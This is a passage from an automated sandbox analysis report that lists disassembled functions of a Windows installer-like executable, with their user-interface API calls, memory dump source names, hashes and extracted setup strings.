                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 747815384-0
                                                                                                                                                                                                                                                • Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                                                                                                                                                                                                • Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64
                                                                                                                                                                                                                                                Function 00407D06 Relevance: 22.7, APIs: 15, Instructions: 231windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                                                                                                                                                                                • LoadIconW.USER32(00000000), ref: 00407D33
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000), ref: 00407D54
                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00407EAA
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
                                                                                                                                                                                                                                                • LoadIconW.USER32(00000000), ref: 00407F0D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B1), ref: 00407F28
                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 00407F2F
                                                                                                                                                                                                                                                  • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                                                                                                                                                                                                  • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                                                                                                                                                                                                  • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                                                                                                                                                                                  • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1889686859-0
                                                                                                                                                                                                                                                • Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                                                                                                                                                                                                                • Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF
                                                                                                                                                                                                                                                Function 00406F37 Relevance: 16.6, APIs: 11, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00406F45
                                                                                                                                                                                                                                                • GetWindowLongW.USER32(00000000), ref: 00406F4C
                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
                                                                                                                                                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 00406F91
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000032), ref: 00406F98
                                                                                                                                                                                                                                                • GetWindowDC.USER32(?), ref: 00406FAA
                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00406FB7
                                                                                                                                                                                                                                                • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00406FF3
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2586545124-0
                                                                                                                                                                                                                                                • Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                                                                                                                                                                                                • Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64
                                                                                                                                                                                                                                                Function 0040677A Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B3), ref: 0040678E
                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B4), ref: 004067AB
                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 004067CC
                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 004067DD
                                                                                                                                                                                                                                                • SetFocus.USER32(00000000,?,000004B4,75920E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ItemMessageSend$Focus
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3946207451-0
                                                                                                                                                                                                                                                • Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                                                                                                                                                                                                • Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28
                                                                                                                                                                                                                                                Function 0040C3D8 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 480COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                                                                                • String ID: IA$IA$IA$IA$IA$IA
                                                                                                                                                                                                                                                • API String ID: 613200358-3743982587
                                                                                                                                                                                                                                                • Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                                                                                                                                                                                                                • Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58
                                                                                                                                                                                                                                                Function 004083B6 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 196COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                                                                                • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
                                                                                                                                                                                                                                                • API String ID: 613200358-994561823
                                                                                                                                                                                                                                                • Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                                                                                                                                                                                                                • Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E
                                                                                                                                                                                                                                                Function 00406DB2 Relevance: 12.1, APIs: 8, Instructions: 69COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00406DFB
                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00406E24
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
                                                                                                                                                                                                                                                • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2693764856-0
                                                                                                                                                                                                                                                • Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                                                                                                                                                                                                • Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65
                                                                                                                                                                                                                                                Function 0040695E Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 0040696E
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000B), ref: 0040698A
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000003D), ref: 00406993
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000003E), ref: 0040699B
                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 004069B8
                                                                                                                                                                                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 004069F9
                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00406A08
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2466489532-0
                                                                                                                                                                                                                                                • Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                                                                                                                                                                                                • Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40
                                                                                                                                                                                                                                                Function 00407B33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00407BBB
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                                                                                                                                                                                • String ID: %d%%
                                                                                                                                                                                                                                                • API String ID: 3753976982-1518462796
                                                                                                                                                                                                                                                • Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                                                                                                                                                                                                                • Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59
                                                                                                                                                                                                                                                Function 0040408B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
                                                                                                                                                                                                                                                  • Part of subcall function 00401A85: CharUpperW.USER32(?,7591E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                                                                                                                                                                                  • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@$CharUpper$lstrlen
                                                                                                                                                                                                                                                • String ID: hAA
                                                                                                                                                                                                                                                • API String ID: 2587799592-1362906312
                                                                                                                                                                                                                                                • Opcode ID: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                                                                                                                                                                                                                                • Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658
                                                                                                                                                                                                                                                Function 00404CBC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 92COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8
                                                                                                                                                                                                                                                  • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                                                                                                                                                                                                  • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                                                                                                                                                                                                  • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                                                                                                                                                                                                  • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
